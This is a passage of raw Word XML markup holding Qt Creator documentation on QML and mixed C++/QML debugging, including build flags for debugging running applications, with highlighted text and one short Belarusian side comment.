          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To debug applications on devices</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, check that Qt 4.7.4, or later, libraries are installed on the device and</w:t>
      </w:r>
      <w:r w:rsidR="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3023" w:history="1">
        <w:r w:rsidRPr="003613F0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>select the corresponding kit for the device</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>before you start debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00747E01">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2765" w:name="mixed-c-qml-debugging"/>
      <w:bookmarkStart w:id="2766" w:name="_Toc483604473"/>
      <w:bookmarkStart w:id="2767" w:name="_Toc483605693"/>
      <w:bookmarkEnd w:id="2765"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mixed C++/QML Debugging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2766"/>
      <w:bookmarkEnd w:id="2767"/>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747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To debug both the C++ and QML parts of your application at the same time, select the</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable C++</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable QML</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>checkboxes for both languages in the</w:t>
      </w:r>
      <w:r w:rsidR="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger Settings</w:t>
      </w:r>
      <w:r w:rsidR="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section in the project</w:t>
      </w:r>
      <w:r w:rsidR="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qtcreator/images/qtquick-debugging-settings.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1082" type="#_x0000_t75" alt="" style="width:187.2pt;height:53.55pt">
            <v:imagedata r:id="rId3024" r:href="rId3025"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00747E01">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2768" w:name="starting-qml-debugging"/>
      <w:bookmarkStart w:id="2769" w:name="_Toc483604474"/>
      <w:bookmarkStart w:id="2770" w:name="_Toc483605694"/>
      <w:bookmarkEnd w:id="2768"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Starting QML Debugging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2769"/>
      <w:bookmarkEnd w:id="2770"/>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rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To start the application, </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>choose</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug &gt; Start Debugging &gt; Start Debugging</w:t>
      </w:r>
      <w:r w:rsidR="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or press</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F5</w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once the application starts running, it behaves and performs as usual. </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then perform the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00747E01" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Debug JavaScript functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00747E01" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Execute JavaScript expressions to get information about the state of the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00747E01" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Change QML code and immediately see the changes at runtime</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>крута</w:t>
      </w:r>
      <w:r w:rsidR="00747E01" w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00747E01" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inspect QML code and change it temporarily at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>debug already running applications</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Build the application by using the appropriate configuration parameters (if you build the application with Qt Creator, it automatically uses the correct configuration):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Qt Quick 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CONFIG+=declarative_debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Qt Quick 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CONFIG+=qml_debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start the application with the following arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
